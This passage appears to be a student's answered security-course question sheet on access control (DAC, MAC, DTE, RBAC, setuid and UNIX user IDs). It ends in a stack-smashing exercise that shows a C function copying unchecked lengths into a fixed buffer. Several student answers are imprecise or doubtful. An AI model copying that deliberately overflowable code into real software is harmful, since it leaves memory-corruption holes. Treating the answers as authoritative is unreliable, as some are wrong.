MLS. Also identify the main advantage of MLS over DTE. (40 words or less.) -------------------------------------------------------------------------------------- MLS requires us to trust a process while DTE designate domains to have the due access rights (and ensure the least of privilege principle). MSL policies are simple and easier than DTE, straightly related to higher level objectives such as confidentiality and integrity. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 20) “Trojan Horses provide a mechanism to defeat DAC, and hence motivate the need for MAC.” Explain precisely what is meant here. -------------------------------------------------------------------------------------- In DAC the protection of an object is responsibility of its owner. A Trojan horse could simply change access permissions on an object so that it would be accessed by anyone. This motivates MAC, where the permissions are set by a centralized process, allowing the principle of least privilege. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 21) Some software providers argue that publishing source code is bad for security, as it makes it easier for attackers to find vulnerabilities. What is the flaw in this argument? (Hint: Is this an instance of “security by obscurity?”) Your answer should be less than 30 words. -------------------------------------------------------------------------------------- Bugs and flaws may exist in custom/hidden systems that has not been analysed as well as open/published/common-use systems/codes. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 22) Consider a root-owned directory /abc which is world-writable. Suppose that it contains a root-owned file /abc/f that is writable only by its owner. Is there any way for a non-root user to change the contents of this file? How? (30 words or less.) -------------------------------------------------------------------------------------- If the directory has permissions 777 (rwxrwxrwx). Write allows any user to create or delete files in a directory, they cannot overwrite a file without the file write permission but the same effect is achivied by deleting the file and then recreating. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 23) What is the principle of fail-safe defaults, and how does it lead to increased security? Does it significantly decrease usability? Explain. (40 words or less.) -------------------------------------------------------------------------------------- Fail-safe defaults is a Design Principles basing on permisions, not in exlclusion, i.e. the default condition of the system is the lack of permission. This is safer since denying access if in doublt is better if the system is under attack. It might make descrease usability in case of a bad designed system where bugs are frequent. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 24) UNIX utilizes the privileged mode of execution provided by modern processors to ensure that user processes cannot access kernel memory. However, root-owned processes may be able to circumvent this protection by writing to the device /dev/kmem. Which security principle is being violated here? (Strictly 5 words or less.) -------------------------------------------------------------------------------------- Principles of Least Privilege, process should have access to resources that only needed. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 25) What is role-based access control? What is its primary benefit? (40 words or less.) -------------------------------------------------------------------------------------- IN RBAC, as alternative to MAC and DAC, the managment of users are given by assigning roles. Access decisions don’t depend on users’ names but on the functions which they are currently performing. In an organization there many functions and jobs, each with their specific permissions. RBAC can use this logic to assign access decisions based on the roles that individual users have as part of an organization. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 26) What is the “confused deputy” problem? (40 words or less.) -------------------------------------------------------------------------------------- The confused deputy problem is one motivation for the use of capabilities. It refers to a system that runs with authority from two different sources. A capability, as a communicable, unforgeable token of authority, can be used in this case to assign to an object the correct set of access rights. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 27) In one of the early illustrations of the security provided by DTE, it was shown that it can help defeat “rootkit” attacks. Explain how. -------------------------------------------------------------------------------------- The misuse of root privileges is a problem in UNIX security because an attacker can get total control of the system once she gets acess to the root previlige. DTE is configured on the principle of least privilege, , restricting uncessary acess from certain domais to security-critical files, dificulting the execution of rootkits. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 28) What is the inference problem in databases? (40 words or less.) -------------------------------------------------------------------------------------- Records in a DB may be sensitive and they might be subject to inference from others query results. To provent it one can prescibe a minimum size on sets to be computed, and/or insert random error in outputs, and/or limit the number of related queries by user. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 29) When a setuid-to-root executable is executed by a non-root process, the value of LD LIBRARY PATH is ignored by the system loader. Why? Are there other aspects of the invocation of setuid application that needs to be checked? (40 words or less.) -------------------------------------------------------------------------------------- With setuid, an user might have complete control over processes: debugging it, modify its memory, send signals, etc. This could be also used against the setuid process. One way of avoiding it is not giving access to the LD_LIBRARY_PATH (path to where dynamically loaded libraries are). Other problem would be write the memory of the process or using ptrace. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 30) Consider the following scheme for generating one-time passwords P0 , P1 , P2 , . . .. P0 = EK (IV ), where IV is an initial vector, and K is a secret key shared between the user the system accepting OTPs, and EK denotes an encryption technique such as DES. For i > 0, Pi = H n−i (Pi−1 ). -------------------------------------------------------------------------------------- No. One time passwords requires a segure one-way hash function. The algorithm on DES is an archetypal block cipher, it takes a fixed-length string of plaintext bits and transforms it into another ciphertext. The solution would be to use One-way compression functions. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 31) Identify whether each of the following mechanisms represent DAC (D), MAC (M), or neither (N). -------------------------------------------------------------------------------------- D File permissions in UNIX D File permissions in Windows M DTE D Access control lists (ACLs) M MLS M LOMAC %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 32) One of the key principles for improving OS security is that of breaking up monolithic root privilege into several smaller privileges. Which of the following relate to this principle? -------------------------------------------------------------------------------------- T DTE T POSIX capabilities T Role-based access control T Clark-Wilson policy %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -------------------------------------------------------------------------------------- 33) Which of the following statements are correct? -------------------------------------------------------------------------------------- T All permission checking is done in UNIX based on the effective userid of a process F All permission checking is done in UNIX based on the real userid of a process F All permission checking is done in UNIX based on the saved userid of a process T Processes with effective userid of zero can change their effective, real and saved userids to arbitrary values. F The access system call can be used to check permissions based on saved userid. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 34) STACK SMASHING int auth(const char *username, int ulen, const char *pass, int plen) { char *nbuf; char user[512]; nbuf = malloc(buflen+1); bcopy(username, user, ulen); bcopy(pass, 